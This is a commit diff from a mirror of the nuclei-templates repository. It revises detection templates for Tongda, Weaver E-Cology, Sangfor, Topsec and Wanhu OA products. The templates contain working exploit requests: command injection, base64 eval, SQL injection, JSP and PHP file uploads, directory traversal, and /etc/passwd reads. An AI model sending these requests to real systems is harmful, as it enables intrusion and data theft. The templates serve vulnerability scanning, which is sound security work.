daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

templates update -2

patch-1
Ritik Chaddha 2023-09-15 00:41:38 +05:30
parent 68f86634de
commit 9e8623a907
22 changed files with 316 additions and 339 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
http/vulnerabilities/sangfor/sangfor-login-rce.yaml
View File

@ -10,9 +10,9 @@ info:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml
metadata:
max-request: 1
fofa-query: fid="iaytNA57019/kADk8Nev7g=="
verified: true
tags: sangfor,ad,rce
fofa-query: fid="iaytNA57019/kADk8Nev7g=="
tags: sangfor,rce
http:
- raw:
@ -23,7 +23,6 @@ http:
clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
matchers-condition: and
matchers:
- type: dsl
dsl:

0
http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml → http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
View File

17
http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml → http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
View File

@ -1,7 +1,7 @@
id: tongda-v2017-action-uploadfile
id: tongda-action-uploadfile
info:
name: Tongda OA v2017 action_upload.php - Arbitrary File Upload
name: Tongda OA v2017 action_upload - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
@ -11,9 +11,12 @@ info:
- https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
tags: tongda,fileupload
fofa-query: app="TDXK-通达OA"
tags: tongda,fileupload,intrusive
variables:
num: "999999999"
http:
- raw:
@ -21,8 +24,6 @@ http:
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
@ -44,7 +45,7 @@ http:
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php echo md5(40167);unlink(__FILE__);?>
<?php echo md5({{num}});unlink(__FILE__);?>
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
@ -59,7 +60,7 @@ http:
matchers:
- type: word
words:
- "1f18933ca1e531c1eac9cccc4952a03b"
- '{{md5(num)}}'
- type: status
status:

15
http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml → http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml
View File

@ -1,19 +1,19 @@
id: tongda-contact-list-disclosure
id: tongda-contact-list-exposure
info:
name: Tongda OA v2014 Get Contactlistt - Exposure
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,oa,exposure
http:
- method: GET
path:
@ -23,9 +23,10 @@ http:
matchers:
- type: word
words:
- "user_uid"
- "user_name"
- "priv_name"
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
- type: status
status:

22
http/vulnerabilities/tongda/tongda-getdata-rce.yaml
View File

@ -1,7 +1,7 @@
id: tongda-getdata-rce
info:
name: Tongda OA v11.9 getadata - Remoce Code Execution
name: Tongda OA v11.9 getadata - Remote Code Execution
author: SleepingBag945
severity: critical
description: |
@ -10,21 +10,27 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,rce
variables:
payload: "echo RCE;"
num: '999999999'
payload: "echo md5({{num}});"
http:
- method: GET
path:
- "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "RCE") && contains(body, "pagelimit")'
- 'status_code == 200'
condition: and
- type: word
words:
- '{{md5(num)}}'
- 'pagelimit'
condition: and
- type: status
status:
- 200

6
http/vulnerabilities/tongda/tongda-insert-sqli.yaml
View File

@ -10,8 +10,8 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,sqli
http:
@ -23,13 +23,15 @@ http:
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "PHPSESSID="
- "register_for/?rid="
condition: and
- type: status
status:
- 302

29
http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
View File

@ -5,14 +5,13 @@ info:
author: SleepingBag945
severity: medium
description: |
Tongda Meeting Unauthorized Access wereDetected
Tongda Meeting Unauthorized Access were Detected.
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
- https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml
- https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,unauth,misconfig
http:
@ -20,21 +19,9 @@ http:
path:
- "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"
matchers-condition: and
matchers:
- type: word
words:
- "creator"
- "originalTitle"
- "view"
- "type"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
- type: dsl
dsl:
- status_code == 200 && contains(header, 'application/json')
- contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
condition: and

37
http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml Executable file
View File

@ -0,0 +1,37 @@
id: topsec-topapplb-auth-bypass
info:
name: Topsec TopAppLB - Authentication Bypass
author: SleepingBag945
severity: high
description: |
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
max-request: 1
verified: true
fofa-query: title="TopApp-LB 负载均衡系统"
tags: topsec,topapplb,auth-bypass
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName=admin&password=%3Bid
- |
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && status_code_2 == 200'
- 'contains(body_2,"var IsHeadMin ")'
- 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
condition: and

9
http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
View File

@ -15,17 +15,18 @@ info:
fofa-query: app="万户网络-ezOFFICE"
tags: wanhu,sqli
http:
- raw:
- |
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1
@timeout: 15s
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(body, "iSignature HTML V6")'
- 'contains_all(body, "iSignature", "DoYFSignature")'
condition: and

34
http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml Executable file
View File

@ -0,0 +1,34 @@
id: ecology-jqueryfiletree-traversal
info:
name: Weaver E-Cology JqueryFileTree - Directory Traversal
author: SleepingBag945
severity: medium
description: |
Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24
metadata:
max-request: 1
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: weaver,ecology,traversal,lfr
http:
- method: GET
path:
- "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../"
matchers-condition: and
matchers:
- type: word
words:
- "'index.jsp','"
- "重命名"
- "新建目录"
condition: and
- type: status
status:
- 200

45
http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml
View File

@ -1,45 +0,0 @@
id: weaver-e-bridge-linux-saveyzjfile-file-read
info:
name: weaver-e-bridge-linux-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'root:x:0')"
condition: and

45
http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml
View File

@ -1,45 +0,0 @@
id: weaver-e-bridge-windows-saveyzjfile-file-read
info:
name: weaver-e-bridge-windows-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'Program Files')"
condition: and

33
http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml
View File

@ -1,33 +0,0 @@
id: weaver-e-cology-getdata-sqli
info:
name: weaver-e-cology-getdata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1759627252"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录

35
http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml
View File

@ -1,35 +0,0 @@
id: weaver-e-cology-getsqldata-sqli
info:
name: weaver-e-cology-getsqldata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"api_status":'
- '"status":true}'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

30
http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml
View File

@ -1,30 +0,0 @@
id: weaver-e-cology-hrmcarreerapplyperview-sqli
info:
name: weaver-e-cology-hrmcarreerapplyperview-sqli
author: SleepingBag945
severity: high
description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感文件
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
matchers-condition: and
matchers:
- type: word
part: body
words:
- "900150983cd24fb0d6963f7d28e17f72"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

33
http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml
View File

@ -1,33 +0,0 @@
id: weaver-e-cology-jqueryfiletree-directory-traversal
info:
name: weaver e-cology-jqueryfiletree-directory-traversal
author: SleepingBag945
severity: medium
description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: weaver,e-cology,oa
http:
- raw:
- |
GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "'index.jsp','"
- type: word
words:
- "重命名"
- type: word
words:
- "新建目录"
- type: status
status:
- 200

53
http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml
View File

@ -1,53 +0,0 @@
id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload
info:
name: weaver e-cology KtreeUploadAction arbitrary file upload
author: SleepingBag945
severity: critical
description: 泛微E-Cology存在文件上传漏洞攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用
reference:
- https://buaq.net/go-117479.html
tags: ecology,upload,fileupload,intrusive
http:
- raw:
- |
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
Accept-Encoding: gzip
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: filename
internal: true
group: 1
regex:
- "','url':'(.*?)','title"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'original')"
- "contains(body_2, '1841626426') && status_code_2 == 200"
condition: and
# Enhanced by md on 2022/10/31

50
http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml Normal file
View File

@ -0,0 +1,50 @@
id: weaver-ebridge-lfi
info:
name: Weaver E-Bidge saveYZJFile - Local File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
metadata:
max-request: 1
verified: true
shodan-query: eBridge_JSessionid
fofa-query: app="泛微云桥e-Bridge"
tags: eBridge,weaver,oa,lfi,lfr,intrusive
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1
Host: {{Hostname}}
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
path:
- file:///C:/&fileExt=txt
- file:///etc/passwd&fileExt=txt
stop-at-first-match: true
skip-variables-check: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
- "status_code_2 == 200 && contains(header_2, 'filename=')"
- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
condition: and
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'

26
http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml → http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
View File

@ -1,10 +1,16 @@
id: weaver-e-cology-bshservlet-rce
id: weaver-ecology-bshservlet-rce
info:
name: Weaver E-Cology BeanShell Remote Command Execution
name: Weaver E-Cology BeanShell - Remote Command Execution
author: SleepingBag945
severity: critical
description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
description: |
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
metadata:
max-request: 1
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: beanshell,rce,weaver
http:
@ -16,7 +22,6 @@ http:
bsh.script=print%28%22{{randstr}}%22%29%3B
- raw:
- | # bypass waf
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
@ -26,15 +31,12 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- type: regex
regex:
- "BeanShell Test Servlet"
- type: word
words:
- "{{randstr}}"
- "(?i)<pre>(\n.*){{randstr}}"
condition: and
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
- 200

39
http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml Executable file
View File

@ -0,0 +1,39 @@
id: weaver-ecology-getsqldata-sqli
info:
name: Weaver E-Cology `getsqldata` - SQL Injection
author: SleepingBag945
severity: high
description: |
When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
reference:
- https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
metadata:
max-request: 2
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: word
part: body
words:
- '{"api_status":'
- '"status":true}'
condition: and

35
http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml Executable file
View File

@ -0,0 +1,35 @@
id: weaver-ecology-hrmcareer-sqli
info:
name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
author: SleepingBag945
severity: high
description: |
There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
reference:
- https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
metadata:
max-request: 1
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200

57
http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml Executable file
View File

@ -0,0 +1,57 @@
id: weaver-ktreeuploadaction-file-upload
info:
name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
reference:
- https://buaq.net/go-117479.html
metadata:
max-request: 2
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: weaver,ecology,fileupload,intrusive
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@timeout: 20s
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
@timeout: 20s
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and
extractors:
- type: regex
name: filename
group: 1
regex:
- "','url':'(.*?)','title"
internal: true